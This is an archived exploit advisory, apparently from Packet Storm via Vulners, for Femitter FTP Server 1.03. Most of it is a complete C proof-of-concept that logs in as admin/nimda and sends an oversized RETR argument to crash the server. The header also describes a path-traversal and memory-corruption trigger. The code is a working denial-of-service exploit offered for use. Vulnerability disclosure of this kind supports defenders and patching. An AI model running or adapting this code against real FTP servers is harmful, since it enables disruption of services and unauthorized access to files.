Lucene search
K

fermitter-dos.txt

🗓️ 18 Sep 2008 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Femitter FTP Server 1.03 has a denial of service vulnerability causing crashes via RETR command.

Code
`/*0-----------------------------------------------------------------------------------0*\  
0 0  
| |  
| Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC |  
| |  
| Summary: Femitter Server is an easy-to use HTTP and FTP server application |  
| for Windows which allows you to use your own computer for sharing gigabytes |  
| of files with your friends and colleagues. |  
| |  
| Desc: Femitter HTTP/FTP 1.03 suffers from a denial of service vulnerability |  
| and memory corruption that causes the application to crash. When we send to |  
| the RETR command an argument like AAAA:AAAA or an overly long string of As |  
| (1024), the server crashes instantly. Also, when typing into browser: |  
| ftp://127.0.0.1/\.. we traverse to the install folder of the program(CWD), |  
| and when browsing to ftp://127.0.0.1/\..\/\..\ we get access violation at |  
| address 004A218A in module "fem.exe". Write of address 00000000. |  
| |  
| Producst web page: http://acritum.com/fem/index.htm |  
| |  
| Tested on Microsoft Windows XP SP2 (English) |  
| |  
| Vulnerability discovered by Gjoko 'LiquidWorm' Krstic |  
| |  
| liquidworm [t00t] gmail.com |  
| |  
| http://www.zeroscience.org/ |  
| |  
| 17.09.2008 |  
| |  
0 0  
\*0-----------------------------------------------------------------------------------0*/  
  
  
#include <sys/types.h>  
#include <sys/socket.h>  
#include <netinet/in.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
#include <unistd.h>  
#include <errno.h>  
#include <netdb.h>  
  
  
#define MANA "\x52\x45\x54\x52\x20\x41\x41\x41\x41\x3A\x41\x41\x41\x41\xD\xA"  
  
  
void header(void);  
  
  
int main (int argc, char *argv[])  
{  
  
  
int sckt = 0, sfd = 0;  
char user[] = "USER admin\r\n";  
char pass[] = "PASS nimda\r\n";  
  
unsigned char payload[]=  
  
"\x52\x45\x54\x52\x20\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\xD\xA";  
  
header();  
  
if(argc != 3)  
{  
printf("\nUsage: %s [ip] [port]\n\n", argv[0]);  
return (EXIT_SUCCESS);  
}  
  
struct sockaddr_in dos_ftp;  
sfd = socket(AF_INET, SOCK_STREAM, 0);  
if(sfd < 0)  
{  
perror("Socket");  
printf("Error creating socket...\n");  
return(1);  
}   
  
printf("\n\n[+] Socket created!\n");  
sleep (1);  
  
memset(&dos_ftp, 0x0, sizeof(dos_ftp));  
dos_ftp.sin_family = AF_INET;  
dos_ftp.sin_addr.s_addr = inet_addr(argv[1]);  
dos_ftp.sin_port = htons(atoi(argv[2]));  
sckt = connect(sfd, (struct sockaddr *) &dos_ftp, sizeof(dos_ftp));  
if(sckt < 0)  
{  
perror("Connect");  
printf("Error connecting...\n");  
return(1);  
}   
  
printf("[+] Connection established!\n");  
sleep (1);  
  
write(sfd, user, strlen(user)); // username  
printf("[+] Sending CMD: %s\n", user);  
sleep (2);  
  
write(sfd, pass, strlen(pass)); // password  
printf("[+] Sending CMD: %s\n", pass);  
sleep (2);  
  
printf("[+] Sending malicious buffer to %s on port %s ...\n", argv[1], argv[2]);  
sleep(2);  
  
send(sfd, payload, sizeof(payload), 0); // send(sfd, MANA, sizeof(MANA),0);  
printf("[+] Malicious buffer succesfully sent...\n");  
sleep (1);  
printf("[+] Femitter FTP Server v1.03 on %s has crashed!\n\n", argv[1]);  
  
close (sfd);  
  
return(0);  
}  
  
void header()  
{  
printf("\n********************************************************************************\n\n");  
printf("\tFemitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC\n");  
printf("\t\t\tby LiquidWorm <liquidworm [t00t] gmail.com>\n\n");  
printf("********************************************************************************\n\n");  
}  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation